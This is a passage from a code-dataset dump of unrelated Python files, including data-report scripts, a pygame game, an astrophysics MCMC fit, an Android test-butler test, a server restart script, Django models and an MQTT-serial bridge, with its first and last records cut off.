runner.DaemonRunner(daemon_app)\ndaemon_runner.do_action()\n","sub_path":"daemon_runner.py","file_name":"daemon_runner.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"244974701","text":"from src.helpers.postprocess import get_attachment_counts_or_percents\n\nimport pandas as pd\nimport swifter # noqa: F401\nfrom ast import literal_eval\n\n\nif __name__ == \"__main__\":\n df_all = pd.read_csv(filepath_or_buffer='data/attachment_type_report.csv')\n\n id_columns = list(df_all.columns)\n\n # Reshape ---\n # filter for whitehall and specialist publisher-only\n df = df_all[df_all[\"publishing_app\"].isin([\"whitehall\", \"specialist\"])].copy()\n\n # convert each element to dictionary\n df[\"attachment_and_count\"] = df[\"attachment_and_count\"].swifter.apply(literal_eval)\n # turn each key into column\n df_attachments = pd.json_normalize(data=df[\"attachment_and_count\"])\n\n # identify pdf-only and html-only attachments\n # to see if reduction in pdf-only leads to rise in html-only\n col_names = list(df_attachments.columns)\n\n for attach in (\".pdf\", \".html\"):\n # identify pdf-only attachments - fragile since relies on \".pdf\" being first in tuple above\n if attach == \".pdf\":\n col_names.remove(\".pdf\")\n # identify html-only attachments - fragile since relies on \".pdf\" being first in tuple above\n elif attach == \".html\":\n col_names.append(\".pdf\")\n col_names.remove(\".html\")\n\n # get attachment + '_only' entries\n new_col_name = attach + '_only'\n df_attachments[new_col_name] = df_attachments.loc[:, col_names].isnull().all(axis=1) & \\\n df_attachments.loc[:, attach].notnull() # noqa: E127\n\n # concat horizontally these two dfs together\n df = pd.concat(objs=[df.reset_index(), df_attachments], axis=1)\n df = df.drop(columns=\"index\")\n del df_attachments, col_names\n\n # melt these attachment columns\n id_columns = id_columns + [\".pdf_only\", \".html_only\"]\n df = pd.melt(frame=df,\n id_vars=id_columns,\n 
var_name='attachment_type',\n value_name='attachment_count')\n # remove nas\n df = df.dropna(subset=[\"attachment_count\"])\n\n # remove brackets in primary_publishing_organisation\n df[\"primary_publishing_organisation\"] = df[\"primary_publishing_organisation\"].str.replace(pat=r'[\\[\\]]', repl='')\n # rename column to make it clearer this column is for QA purposes\n df = df.rename(columns={\"attachment_and_count\": \"qa_attachment_count\"})\n\n # Report: Organisation and Document Type ---\n # get reports along the following cuts:\n # i. Publishing organisation attachments for counts for all time\n # ii. Publishing organisation attachments for counts for restricted dates\n # iii. Publishing organisation attachments for percents for all time\n # iv. Publishing organisation attachments for percents for restricted dates\n # v. Document type attachments for counts for all time\n # vi. Document type attachments for counts for restricted dates\n # vii. Document type attachments for percents for all time\n # viii. Document type attachments for percents for restricted dates\n filters = {\"primary_publishing_organisation\": [\"counts\", \"percents\"],\n \"document_type\": [\"counts\", \"percents\"]}\n restrict_dates = ['2019-09-23', '2020-12-07']\n\n df_list = list()\n df_names_list = ['attachment_type_org_counts',\n 'attachment_type_org_restrict_dates_counts',\n 'attachment_type_org_percents',\n 'attachment_type_org_restrict_dates_percents',\n 'attachment_type_doc_counts',\n 'attachment_type_doc_restrict_dates_counts',\n 'attachment_type_doc_percents',\n 'attachment_type_doc_restrict_dates_percents']\n for key, value in filters.items():\n for v in value:\n df_temp_all = get_attachment_counts_or_percents(df=df, index=key, values=v)\n df_temp_all[\"date_coverage\"] = \"all\"\n df_temp_restrict = get_attachment_counts_or_percents(df=df, index=key, values=v, date=restrict_dates)\n df_temp_restrict[\"date_coverage\"] = ' to '.join(restrict_dates)\n df_list.append(df_temp_all)\n df_list.append(df_temp_restrict)\n\n del df_temp_all, df_temp_restrict, id_columns, key, value, filters, restrict_dates, attach, new_col_name\n\n # export to csv\n files_save = dict(zip(df_names_list, df_list))\n [v.to_csv(path_or_buf='data/' + k + '.csv', index=False) for k, v in files_save.items()]\n","sub_path":"src/report_generators/attachment_type_report_postprocess.py","file_name":"attachment_type_report_postprocess.py","file_ext":"py","file_size_in_byte":4461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"334983830","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# Gong@2019-03-29\n\nimport sys\nimport pygame\nimport settings\nfrom ship import Ship\nimport game_functions as gf\nfrom pygame.sprite import Group\n\ndef run_game():\n pygame.init()\n ai_settings = settings.Settings()\n screen = pygame.display.set_mode((ai_settings.screen_width,ai_settings.screen_height))\n pygame.display.set_caption(\"Alien Invasion\")\n ship = Ship(ai_settings, screen)\n bullets = Group()\n while True:\n gf.check_events(ai_settings, screen, ship, bullets)\n ship.update_self()\n bullets.update()\n # delete old bullets\n for bu in bullets.copy():\n if bu.rect.bottom <= 0:\n bullets.remove(bu)\n print(len(bullets))\n gf.update_screen(ai_settings, screen, ship, 
bullets)\n\n\nrun_game()\n","sub_path":"alien_invasion.py","file_name":"alien_invasion.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"2087095","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ax\nfrom matplotlib.ticker import MultipleLocator, FormatStrFormatter, LogLocator\nfrom matplotlib import rc\nrc('font', **{'family':'serif'})\nfrom scipy.integrate import quad, trapz, simps\n#import pickle\nimport emcee\nfrom astropy import constants as const\nimport astropy.units as u\nfrom clumps import*\nfrom functions_py3X import*\nimport h5py\nfrom astropy.io import fits\nfrom mcfit import P2xi\n\n# parallel MCMC\nfrom multiprocessing import Pool\nimport os\nfrom contextlib import closing\nos.environ[\"OMP_NUM_THREADS\"] = \"1\"\n\n\n\n\n\n# PARAMETERS - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - -- - - - - - - - - -\n\n\nemission = 1.37e-12*8.7 # effective rec * h * nu_Ha (erg) Te= 1e4k n_e = 100 cm-3\n\n# halo array\nr_halo = np.linspace(0.1,400.,200)\n\n\n# mcmc\nwalkers = 21\nsteps = 8000\nparameters = 7 # of the model\n\n\nredrange = np.array([3.5, 4.5, 5.5])\nnamerange = np.array(['34', '45', '56'])\n\n\n# satellites \nlyafesc = 0.5 # escape of lya photons from satellite galaxies\nduty = 0.01 # dutty cycle of the satellite star formation \n\nnhi = 1.55\n\n\n# - - - - - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - -- - - - - - - - - -\n\n\n\n\n# MCMC FUNCTIONS \n \n\ndef fmodel(sfr, level, slope, position, residual, rhosfr, bias_product):\n # fc and fesc\n fcc = level / (1. + np.exp(slope * (r_halo - position) )) \n fcc[np.where(r_halo > position)] += residual\n \n #plt.plot(r_halo, fcc, 'k')\n #plt.semilogy(sxx, model, 'ro')\n #plt.show()\n #fgft\n relvel = 100\n fchi, fcfa, fca, fshi, fsa, fsfa = ffcfesc(fcc, nhi, relvel, z, r_halo)\n #plt.semilogy(r_halo, fca, 'k')\n #plt.semilogy(sxx, model, 'ro')\n #plt.show()\n #kajsd\n # introduce SFR\n nion = 1.38e53*sfr\n # factors multiplying SB\n factors = 2. / 3.08e21**2 / (1. +z)**4 * 2.35e-11 / 4.**2 / np.pi**2 * nion * emission\n total_lya_flux = sfr * sfrlya / 4. / np.pi / LD**2\n\n # sb calc\n flu, scat, fluscat = fsb(fchi, fshi, fca, fsa, fcfa, fsfa, r_halo)\n #fluscat[0]=fluscat[1] \n flus= flu* factors # point source fluorescence\n flus = 10** np.interp(pos, r_halo, np.log10(flus))\n #scats = scat * factors # point source scattering Lya \n #scats = 10** np.interp(pos, r_halo, np.log10(scats))\n #plt.semilogy(pos, scats, 'k')\n #plt.show()\n\n\n #print(fluxfraction(pos, scats))\n #scats = 10**np.interp(r_halo, pos, np.log10(scats), left=0.0, right=0.0)\n\n #a= fluxfraction(pos, scats)*kpc2arc**2 \n #print(kpc2arc**2)\n #print(1./ (1. +z)**4)\n #print(1./kpc2arc / (1.+z)**4)\n #asdf\n\n #scats = 10** np.interp(r_halo, pos, np.log10(scats))\n #convscat = conv(pos, scats, psf, pos)\n #convscat = 10**np.interp(r_halo, pos, convscat)\n #b= fluxfraction(pos, convscat)*kpc2arc**2 \n #print(a, b, a/b)\n #print(1- a/total_lya_flux, 1-b/total_lya_flux)\n\n # calculate unscattered \n #unscattfrac = np.max([0.0, 1. 
- unfsb(fchi, fshi, fca, fsa, fcfa, fsfa, r_halo)])\n #print('unscat frac = ', unscattfrac)\n #adsfa\n \n # add SB UVB\n uvb = fuvbsb(z, fchi, r_halo) * fphoto(z)\n uvb = 10** np.interp(pos, r_halo, np.log10(uvb))\n #plt.semilogy(pos, uvb, 'b')\n #plt.semilogy(pos, uvb)\n #plt.show()\n \n \n # add satellites \n sat = sbsat(z, rhosfr * maxsfr(z), bias_product, lyafesc, duty, r_xi, xi, r_halo)\n sat = 10** np.interp(pos, r_halo, np.log10(sat)) \n #plt.semilogy(pos, sat, 'r')\n #plt.show()\n #aksda\n\n \n\n # calculate unscattered\n #convlya = conv(pos, scats, psf)\n\n\n #frac = fluxfraction(pos, convlya) * kpc2arc**2 / total_lya_flux\n #print('unscat integ = ', np.max([0.0, 1-frac]))\n #print(' ')\n #print(' ')\n \n # add 3 SB components and convolve\n convscat = conv(pos, flus + uvb +sat , psf) \n\n \n \n # add unscattered convolved by psf \n #convscat += fremain(total_lya_flux, frac, psf)\n \n #plt.semilogy(pos, convscat)\n #plt.semilogy(pos, sb, 'ko')\n #plt.show()\n #alsjdf\n #convfluscat = conv(sxx, fluscats, psf, pos)\n\n \n \n return convscat\n\n\n\ndef log_likelihood(theta):\n\n sfr, level, logslope, position, logresidual, logsfr, bias_product = theta\n #print(theta)\n # now it is the model for SCATTERING \n #print(level, position, 10**logresidual, hislope)\n model = fmodel(sfr, level, 10**logslope, position, 10**logresidual, 10**logsfr, bias_product)\n\n sigma2 = sb_error ** 2 \n #plt.semilogy(sxx, sb, 'ko')\n #plt.semilogy(sxx, model, 'ro')\n #plt.show()\n #fgft\n return -0.5 * np.sum((sb - model) ** 2 / sigma2 + np.log(sigma2))\n\n\ndef log_prior(theta):\n sfr, level, logslope, position, logresidual, logsfr, bias_product=theta\n if (0.25 < sfr < 100. and 0.0 < level < 1.0 and -1.5 < logslope < 2.5 and 0. < position < 400. \n and -5.0 < logresidual < -1.5 \n and -5.0 < logsfr < 0. 
and (biaix/1.5)**2 < bias_product < 12* biaix**2):\n\n return 0.0\n return -np.inf\n\n\ndef log_probability(theta):\n lp = log_prior(theta)\n if not np.isfinite(lp):\n #print('inf')\n return -np.inf\n #print(lp + log_likelihood(theta))\n return lp + log_likelihood(theta)\n\n\n\n \n\n# DATA LOOP\n\nfor bs in range(len(redrange)):\n \n # parameters for this iteration\n z = redrange[bs]\n hmf.z = z\n zint = namerange[bs]\n LD = ((cosmo.luminosity_distance(z)).to('cm')).value\n kpc2arc = cosmo.arcsec_per_kpc_proper(z).value\n biaix = getbias(z)\n \n # sb data \n hdu = fits.open('./lutzprofiles/lyaprofile_muse2018_median_z'+str(zint)+'.fits')\n dad = hdu[1].data\n pos = np.array([])\n sb = np.array([])\n sb_error = np.array([])\n for x in range(len(dad)):\n pos = np.append(pos, dad[x][0] / kpc2arc)\n sb = np.append(sb, dad[x][2])\n sb_error = np.append(sb_error, dad[x][3])\n \n \n # psf data \n hdu = fits.open('./lutzprofiles/psfprofile_muse2018_z'+str(zint)+'.fits')\n dad = hdu[1].data\n pospsf = np.array([])\n psf = np.array([])\n for x in range(len(dad)):\n pospsf = np.append(pospsf, dad[x][0] / kpc2arc)\n psf = np.append(psf, dad[x][1])\n # normalize psf\n psf = fnormpsf(pos, pospsf, psf)\n \n \n # SATELLITE GALAXIES\n # power spectrum\n pk = hmf.nonlinear_power\n k = hmf.k \n # correlation function\n r_xi, xi = P2xi(k)(pk)\n # proper kpc\n r_xi = r_xi / h / (1.+z) *1000.\n #plt.loglog(r_xi, xi)\n #plt.show()\n #alkdsj\n \n \n \n # MCMC \n # set walkers and initiate\n ini = (np.array([50., 0.5, 0.0, 25., -3.0, -2.5, biaix**2]) + \n np.array([49., 0.4, 1.,20.,1., 2.3, biaix**2-0.1])*np.random.uniform(-1.0, 1.0, (walkers, parameters)))\n #ini = np.array([1.5, 1.0, 0.0, 30., -3.5, 1.4, 240.0, -2., biaix**2]) + 1e-4 * np.random.rand(walkers, parameters)\n nwalkers, ndim = ini.shape\n \n \n\n \n \n # Backend\n filen = './lutzprofiles/fluo_sat_uvb_lutz'+str(zint)+'.h5'\n backend = emcee.backends.HDFBackend(filen)\n backend.reset(nwalkers, ndim)\n \n \n # SERIE \n # run mcmc \n #maxsteps = 500\n #old_tau = np.inf \n #sampler = emcee.EnsembleSampler(nwalkers, ndim, log_probability)\n #for sample in sampler.sample(pos, iterations=maxsteps, progress=True):\n # # check every 50\n # if sampler.iteration % 10:\n # continue\n # tau = sampler.get_autocorr_time(tol=0)\n # # check convergence\n # converged = np.all(tau < sampler.iteration)\n # converged &= np.all(np.abs(old_tau - tau) / tau < 0.5)\n # if converged:\n # print(' converged at ' + str(tau))\n # break\n # old_tau = tau\n # show progress\n #sampler.run_mcmc(ini, maxsteps, progress=True)\n \n \n \n # PARALLEL\n # old_tau = np.inf\n # index = 0\n # max_steps = 10000\n # autocorr = np.empty(max_steps)\n # check = 20\n # times_greater = 9\n # tau_dif = .2\n\n with closing(Pool()) as pool:\n sampler = emcee.EnsembleSampler(nwalkers, ndim, log_probability, pool=pool, backend=backend)\n sampler.run_mcmc(ini, steps, progress=True)\n # # check concergence every check # of steps\n # for sample in sampler.sample(ini, iterations=max_steps, progress=True): \n # if sampler.iteration % check:\n # continue\n # tau = sampler.get_autocorr_time(tol=0)\n # autocorr[index] = np.mean(tau)\n # converged = np.all(np.abs(old_tau - tau) / tau < tau_dif)\n # converged &= np.all(tau * times_greater < sampler.iteration)\n # if converged:\n # break\n # index += 1\n # old_tau = tau\n pool.terminate()\n # np.savez('./tau_array_file', autocorr[: index+1])\n \n # # plot convergence\n # x = check * np.arange(1, index + 2)\n # y = autocorr[: index+1]\n # plt.plot(x, x / 
times_greater, \"--k\")\n # plt.plot(x, y)\n # plt.xlabel(\"number of steps\")\n # plt.ylabel(r\"mean $\\hat{\\tau}$\");\n # plt.title(f'converged at tau = {tau}, steps = {check*(index + 1)}')\n # plt.show()\n \n # burning\n #flat_samples = sampler.get_chain(discard=100, thin=15, flat=True)\n \n # plot sampling\n #fig, axes = plt.subplots(parameters, figsize=(10, parameters), sharex=True)\n #samples = sampler.get_chain()\n #labels = [\"level\", \"slope\", \"position\", \"residual\", \"hislope\", \"relvel\", \"log(f)\"]\n #for i in range(ndim):\n # ax = axes[i]\n # ax.plot(samples[:, :, i], \"k\", alpha=0.3)\n # ax.set_xlim(0, len(samples))\n # ax.set_ylabel(labels[i])\n # ax.yaxis.set_label_coords(-0.1, 0.5)\n\n #axes[-1].set_xlabel(\"step number\");\n #plt.show()\n \n \n # plot results\n #for i in range(ndim):\n #mcmc = np.percentile(flat_samples[:, i], [16, 50, 84])\n #q = np.diff(mcmc)\n #txt = \"\\mathrm{{{3}}} = {0:.3f}_{{-{1:.3f}}}^{{{2:.3f}}}\"\n #txt = txt.format(mcmc[1], q[0], q[1], labels[i])\n #display(Math(txt))\n \n \n #lajds\n \n\n","sub_path":"lutz2018satel_fluo_py3X.py","file_name":"lutz2018satel_fluo_py3X.py","file_ext":"py","file_size_in_byte":10090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"121982801","text":"import car\nimport weather\nimport notification\n\n\nclass Competition:\n\t\"\"\"Гонка\"\"\"\n\n\t_instance = None\n\n\tdef __new__(cls, *args, **kwargs):\n\t\tif cls._instance is None:\n\t\t\t# Возможно наличие только 1 экземпляра класса\n\t\t\tcls._instance = super().__new__(cls)\n\t\treturn(cls._instance)\n\n\tdef __init__(self, distance):\n\t\tself._distance = distance\n\t\tself._competitors = []\n\t\tself._weather = weather.BaseWeather()\n\t\tself._notification_manager = notification.NotificationManager()\n\t\t\n\tdef set_weather(self, wind_speed=None, ice = None):\n\t\tif not wind_speed is None:\n\t\t\ttry:\n\t\t\t\tif not self._weather.wind_speed is None:\n\t\t\t\t\tself._weather.wind_speed = wind_speed\n\t\t\texcept Exception as e:\n\t\t\t\tself._weather = weather.Wind(self._weather)\n\t\t\t\tself._weather.wind_speed = wind_speed\n\n\t\tif not ice is None:\n\t\t\ttry:\n\t\t\t\tif not self._weather.ice is None:\n\t\t\t\t\tself._weather.ice = ice\n\t\t\texcept Exception as e:\n\t\t\t\tself._weather = weather.Ice(self._weather)\n\t\t\t\tself._weather.ice = ice\n\t\t\t\n\tdef set_competitors(self, competitors):\n\t\tfor competitor in competitors:\n\t\t\tif not competitor in self._competitors:\n\t\t\t\tself._competitors.append(competitor)\n\n\tdef start(self):\n\t\tcompetitors = self._get_cars()\n\t\tresult = self._get_result(self._distance, competitors)\n\t\tself._print_result(result)\n\n\tdef _get_cars(self):\n\t\tcompetitors=[]\n\t\tfor competitor in self._competitors:\n\t\t\tthis_car = car.Car(competitor)\n\t\t\tcompetitors.append(this_car)\n\t\t\tself._notification_manager.subscribe(this_car)\n\t\treturn(competitors)\n\n\tdef _get_result(self, distance, competitors):\n\t\tresult = {} if len(competitors)>0 else False\n\t\tfor competitor in competitors:\n\t\t\tcompetitor_time = 0\n\t\t\tfor step in range(distance):\n\t\t\t\ttime = competitor.get_time(competitor_time, self._weather)\n\t\t\t\tcompetitor_time += time\n\t\t\tresult[competitor.name] = competitor_time\n\t\treturn(result)\n\t\t\n\tdef _print_result(self, result):\n\t\tif result:\n\t\t\tself._notification_manager.notify(result)\n\t\telse: print('None competitors!')\n\n\nobj_competition = 
Competition(10000)\nobj_competition.set_weather(wind_speed=20)\nobj_competition.set_weather(wind_speed=40, ice = True)\nobj_competition.set_competitors(['ferrary'])\nobj_competition.set_competitors(['bugatti', 'toyota','lada','sx4'])\nobj_competition.start()\n","sub_path":"01 сompetition/сompetition.py","file_name":"сompetition.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"483509349","text":"\"\"\"\r\nThis test file performs rudimentary tests on the control flow of TestButler running on the device\r\nIt uses a backdoor request to TestButler to have it initiate a given string command, and the response here is hard\r\ncoded. This is a little hokey, but allows us to test the very basics before anything more elaborate. More\r\nelaborate tests are done elsewhere\r\n\"\"\"\r\nimport logging\r\nimport pytest\r\n\r\nfrom collections import deque\r\nfrom androidtestorchestrator.device import Device\r\nfrom androidtestorchestrator.devicelog import DeviceLog\r\nfrom androidtestorchestrator.application import ServiceApplication\r\nfrom androidtestorchestrator.parsing import TestButlerCommandParser\r\nfrom typing import Callable\r\n\r\n\r\nTAG = \"TestButler\"\r\nlog = logging.getLogger(__name__)\r\n\r\n\r\n@pytest.fixture(scope='session')\r\ndef install_butler(device: Device, test_butler_service: str):\r\n \"\"\"\r\n fixture to install test butler service, prepare logcat\r\n :return: logcat process and iterator over stdout\r\n \"\"\"\r\n service = ServiceApplication.install(test_butler_service, device)\r\n DeviceLog(device).clear()\r\n return service\r\n\r\n\r\n# noinspection PyShadowingNames,PyUnusedLocal\r\nclass TestButlerControlFlow:\r\n\r\n @pytest.mark.parametrize('execution_number', range(10))\r\n # @pytest.mark.skipif(True, reason=\"Only for manual checkout. 
Other tests will stress test integrated system\")\r\n def test_control_flow(self, device: Device, install_butler: ServiceApplication, execution_number: int):\r\n butler_service = install_butler\r\n import asyncio\r\n cmd = [\"logcat\", \"-v\", \"brief\", \"-s\", TAG]\r\n line_count = 0\r\n\r\n flow_seqence = deque([\"awaiting_command\",\r\n \"awaiting_response_confirmation\",\r\n \"awaiting_response_confirmation_code\"])\r\n\r\n class Parser(TestButlerCommandParser):\r\n @staticmethod\r\n def request_command(cmd: str):\r\n cmd = cmd.replace(\" \", \"\\\\ \")\r\n butler_service.start(\".ButlerService\", \"--es\", \"command\", cmd,\r\n intent=\"com.linkedin.android.testbutler.FOR_TEST_ONLY_SEND_CMD\")\r\n\r\n def parse_line(self, line: str):\r\n nonlocal line_count\r\n\r\n if line_count == 0:\r\n line_count += 1\r\n if line != \"---------\":\r\n log.error(\"Logcat did not start with expected line of output\")\r\n # use standard first line of output from logcat to\r\n # kickoff sending backdoor to tell device to echo a test butler command back to this host\r\n self.request_command(\"just a test\")\r\n return\r\n if line.startswith('----'):\r\n return\r\n\r\n if flow_seqence[0] == \"awaiting_command\":\r\n # process line and next informational logcat message should be command that was sent\r\n preamble, line = line.split(\":\", 1)\r\n line = line.strip()\r\n priority, tag = preamble.split(\"(\")[0].split('/', 1)\r\n if priority == \"D\":\r\n return\r\n flow_seqence.popleft()\r\n assert tag == TAG\r\n cmd_id, cmd = line.replace(\"\\\\\", '').split(\" \", 1)\r\n assert cmd == \"TEST_ONLY just a test\"\r\n\r\n # send hard-coded response back based on received id,\r\n # with next to-list item being to wait on the response confirmation back from device\r\n cmd_id = int(cmd_id)\r\n self._send_response(cmd_id=cmd_id, response_code=0, response_msg=\"Success\")\r\n elif flow_seqence[0] == \"awaiting_response_confirmation\":\r\n if line.startswith(\"-----\"):\r\n log.error(\"Recieved unexpected logcat message:\\n \" + line)\r\n if \"crash\" in line:\r\n raise Exception(\"logcat crashed\")\r\n return\r\n if \"Error\" in line:\r\n raise Exception(\"Error processing response: %s\" % line)\r\n if \"Sending command\" in line:\r\n return\r\n try:\r\n preamble, line = line.split(\":\", 1)\r\n line = line.strip()\r\n priority, tag = preamble.split(\"(\")[0].split('/', 1)\r\n except ValueError:\r\n log.error(\"Received unexpected logcat message:\\n \" + line)\r\n return\r\n if priority != 'D':\r\n return\r\n flow_seqence.popleft()\r\n assert tag == TAG\r\n assert line == \"CMD RESPONSE MSG: Success\"\r\n elif flow_seqence[0] == \"awaiting_response_confirmation_code\":\r\n try:\r\n preamble, line = line.split(\":\", 1)\r\n line = line.strip()\r\n priority, tag = preamble.split(\"(\")[0].split('/', 1)\r\n except:\r\n log.error(\"Recieved unexpected logcat message:\\n \" + line)\r\n return\r\n if priority != 'D':\r\n return\r\n flow_seqence.popleft()\r\n assert tag == TAG\r\n assert line == \"CMD RESPONSE STATUS: 0\"\r\n\r\n async def parse_logcat():\r\n line_parser = Parser(app_under_test=None, service=butler_service)\r\n async for line in DeviceLog(device).logcat(\"-v\", \"brief\", \"-s\", TAG):\r\n try:\r\n line_parser.parse_line(line)\r\n except Exception as e:\r\n log.error(\"Exception in processing line: %s\\n %s\" % (line, str(e)))\r\n asyncio.get_event_loop().stop()\r\n if len(flow_seqence) == 0:\r\n break\r\n\r\n async def timer():\r\n await asyncio.wait_for(parse_logcat(), timeout=3*60)\r\n\r\n 
asyncio.get_event_loop().run_until_complete(timer())\r\n        assert len(flow_seqence) == 0, \"Transactions were incomplete\"\r\n","sub_path":"orchestrator/test/test_component_integration/test_butler_control_flow.py","file_name":"test_butler_control_flow.py","file_ext":"py","file_size_in_byte":6307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"602697226","text":"# coding=utf-8\r\n\r\nimport psutil\r\nimport traceback\r\nimport os\r\nfrom run_servers import NAME\r\n\r\ndef removeLog():\r\n    basePath = '%s\\log'%os.getcwd()\r\n    logs = os.listdir(basePath)\r\n    for _log in logs:\r\n        if _log == '.gitignore':\r\n            continue\r\n        filePath = '%s\\%s'%(basePath,_log)\r\n        try:\r\n            os.remove(filePath)\r\n        except:\r\n            print(u'[delete log file] [%s] failed' % _log)\r\n            traceback.print_exc()\r\n        else:\r\n            print(u'[log file deleted] [%s]'%_log)\r\n\r\ndef close_server():\r\n    mainPids = []\r\n    pids = psutil.pids()\r\n    for pid in pids:\r\n        try:\r\n            p = psutil.Process(pid)\r\n            if p.name() != 'python.exe' or NAME not in p.cmdline():\r\n                continue\r\n            # print p.name()\r\n            # print p.cmdline()\r\n            mainPids.append(pid)\r\n        except psutil.AccessDenied:\r\n            pass\r\n        except psutil.NoSuchProcess:\r\n            pass\r\n        except:\r\n            traceback.print_exc()\r\n    if mainPids:\r\n        print(u'current processes: %s' % mainPids)\r\n        os.system('python close_server.py')\r\n        print(u'starting to shut down services')\r\n        while mainPids:\r\n            for _pid in mainPids[:]:\r\n                try:\r\n                    p = psutil.Process(_pid)\r\n                except psutil.NoSuchProcess:\r\n                    mainPids.remove(_pid)\r\n                    print(u'removed pid[%s]'%_pid)\r\n        print(u'all processes have been closed')\r\n    else:\r\n        print(u'no processes currently running')\r\n\r\ndef run_server():\r\n    os.system('python run_servers.py')\r\n    print(u'services started')\r\nif __name__ == '__main__':\r\n    close_server()\r\n    removeLog()\r\n    run_server()","sub_path":"GameServer/games/MJ_GuangXi/restart.py","file_name":"restart.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"187305440","text":"\nimport uuid\nimport datetime\nfrom django.db import models\nfrom django.contrib import admin\nfrom django.template.defaultfilters import slugify\n\n\nclass Artist(models.Model):\n\n    name = models.CharField(max_length=255)\n    deck = models.TextField(blank=True, null=True, help_text=\"Meta/short description. 1-3 sentences. No HTML!\")\n    photo = models.FileField(upload_to='images/artists')\n    bio = models.TextField(blank=True)\n    website = models.URLField(blank=True)\n    published = models.BooleanField(default=True)\n    slug = models.SlugField(editable=False, max_length=255)\n    uuid = models.CharField(max_length=255, editable=False, null=True)\n\n    class Meta:\n        ordering = ('name',)\n    \n    def __unicode__(self):\n        return self.name\n    \n    def get_absolute_url(self):\n        return \"/artists/%s/\" % self.slug\n\n    def save(self):\n        if not self.uuid:\n            self.uuid = unicode(uuid.uuid4())\n        self.slug = slugify(self)\n        super(Artist, self).save()\n\n    \nclass Release(models.Model):\n    \n    FORMATS = (\n        ('Net Release', 'Net Release'),\n        ('CD', 'CD'),\n        ('CDR', 'CDR'),\n        ('Tape', 'Tape'),\n        ('Vinyl', 'Vinyl'),\n        ('DVD+CD', 'DVD+CD'),\n    )\n    \n    artists = models.ManyToManyField(Artist)\n    display_name = models.CharField(max_length=255)\n    title = models.CharField(max_length=255)\n    deck = models.TextField(blank=True, null=True, help_text=\"Meta/short description. 1-3 sentences. 
No HTML!\")\n release_date = models.DateField()\n release_number = models.CharField(max_length=20)\n cover_art = models.FileField(upload_to='images/cover_art')\n description = models.TextField(blank=True)\n reviews = models.TextField(blank=True)\n format = models.CharField(max_length=20, choices=FORMATS)\n price = models.CharField(max_length=20, blank=True)\n purchase_link = models.TextField(blank=True)\n preview_track = models.TextField(blank=True)\n published = models.BooleanField(default=True)\n for_sale = models.BooleanField(default=False)\n out_of_print = models.BooleanField(default=False)\n slug = models.SlugField(editable=False, max_length=255)\n uuid = models.CharField(max_length=255, editable=False, null=True)\n\n class Meta:\n ordering = ('-release_date',)\n\n def __unicode__(self):\n return u\"%s - %s [%s]\" % (self.display_name, self.title, self.release_number)\n\n def get_absolute_url(self):\n return \"/releases/%s/\" % self.slug\n\n def save(self):\n if not self.uuid:\n self.uuid = unicode(uuid.uuid4())\n self.slug = slugify(self)\n super(Release, self).save()\n\n\nclass Track(models.Model):\n\n release = models.ForeignKey(Release)\n disc_number = models.CharField(max_length=3, blank=True, null=True)\n track_number = models.CharField(max_length=3)\n title = models.CharField(max_length=255)\n time = models.CharField(max_length=20, blank=True)\n mp3_url = models.URLField(blank=True)\n flac_url = models.URLField(blank=True)\n\n def __unicode__(self):\n return u\"%s - (%s)\" % (self.title, self.release)\n\n","sub_path":"apps/releases/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"410483982","text":"import paho.mqtt.client as mqtt\nfrom serial import Serial\nimport time\nimport random\n\ns = Serial('COM6', baudrate = 9600)\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected: \" + str(rc))\n client.subscribe(\"pinboards/ledline/percent\")\n\ndef on_message(client, userdata, msg):\n print(msg.topic, msg.payload.decode())\n s.write(bytes(msg.payload.decode() + '\\n', \"utf-8\"))\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.connect(\"simurg.iszf.irk.ru\", 1883, 60)\nclient.loop_forever()\n\n'''while True:\n #value = int(random.random() * 100)\n #client.publish(\"pinboards/ledline/percent\", payload=value)\n s.write(msg.payload.decode())\n #time.sleep(1)'''\n","sub_path":"ledLine-mqtt/mqtt_recv.py","file_name":"mqtt_recv.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"174441023","text":"from django.conf.urls import url\n\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom . 
import api, views\n\nweb_urls = [\n    url(r'^list/$', views.EventList.as_view(), name=\"events_list\"),\n\n]\n\napi_urls = [\n    url(r'^api/events/$', api.EventsListAPI.as_view()),\n]\n\napi_urls = format_suffix_patterns(api_urls)\n\nurlpatterns = web_urls + api_urls\n","sub_path":"apps/events/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"287970918","text":"def main(n):\r\n    n = int(n)\r\n    uni = []\r\n    for i in range(0,n):\r\n        uni.append(32)\r\n    words = []\r\n    word = ''\r\n    while word.count('~')!=n:\r\n        uni.reverse()\r\n        x=1\r\n        i=uni[0]\r\n        if i == 126:\r\n            i=33\r\n            uni[1]=uni[1]+1\r\n        else:\r\n            i=i+1\r\n        uni[0]=i\r\n        \r\n        for i in uni[1:]:\r\n            if i > 126:\r\n                i=33\r\n                uni[x]=i\r\n                uni[x+1]=uni[x+1]+1\r\n            x+=1\r\n        if 32 in uni:\r\n            